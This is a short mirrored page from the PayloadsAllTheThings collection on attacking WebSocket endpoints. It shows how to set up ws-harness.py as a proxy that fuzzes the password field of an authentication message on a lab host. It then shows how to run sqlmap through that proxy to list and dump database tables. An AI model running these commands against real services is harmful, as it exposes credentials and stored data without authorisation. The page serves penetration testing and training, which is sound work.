mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-05 11:05:29 +00:00
1.3 KiB
1.3 KiB
Web Sockets Attacks
The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
Summary
Tools
Using ws-harness.py
Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
The content of the message should contains the [FUZZ] keyword.
{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump